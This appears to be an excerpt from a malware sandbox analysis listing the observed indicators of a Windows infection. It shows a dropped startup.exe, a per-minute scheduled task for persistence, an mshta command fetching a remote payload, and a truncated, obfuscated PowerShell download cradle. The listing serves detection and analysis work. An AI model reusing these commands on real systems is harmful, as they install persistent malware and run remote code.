Technical Information
- <SYSTEM32>\tasks\ctoslab
- %TEMP%\startup.exe
- '13#.#9.113.124':80
- DNS ASK google.com
- '%TEMP%\startup.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $BINGGOLIVE = '(Ne<<<<<<<<<<<<<<<>>>>>>>>>>>t.We'.Replace('<<<<<<<<<<<<<<<>>>>>>>>>>>','w-Object Ne'); $Facebook='bC!!!!!!!!!!!!@@@@@@@@@@@@@nlo'.Replace('!!!!!!!!!!!!@@@@@@@@@@@@@','lient).Dow...' (with hidden window)
- '%TEMP%\startup.exe' ' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c SCHTASKS /CREATE /SC MINUTE /TN "CTOSLAB" /TR "%TEMP%\startup.exe" /MO 1
- '<SYSTEM32>\schtasks.exe' /CREATE /SC MINUTE /TN "CTOSLAB" /TR "%TEMP%\startup.exe" /MO 1
- '%WINDIR%\syswow64\mshta.exe' http://13#.#9.113.124/Putbzvzw/Encoding.txt
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $BINGGOLIVE = '(Ne<<<<<<<<<<<<<<<>>>>>>>>>>>t.We'.Replace('<<<<<<<<<<<<<<<>>>>>>>>>>>','w-Object Ne'); $Facebook='bC!!!!!!!!!!!!@@@@@@@@@@@@@nlo'.Replace('!!!!!!!!!!!!@@@@@@@@@@@@@','lient).Dow...
- '<SYSTEM32>\taskeng.exe' {53C0D587-B81E-4B88-BD58-1A3E822287EB} S-1-5-21-1960123792-2022915161-3775307078-1001:hsrlkmedjvav\user:Interactive:[1]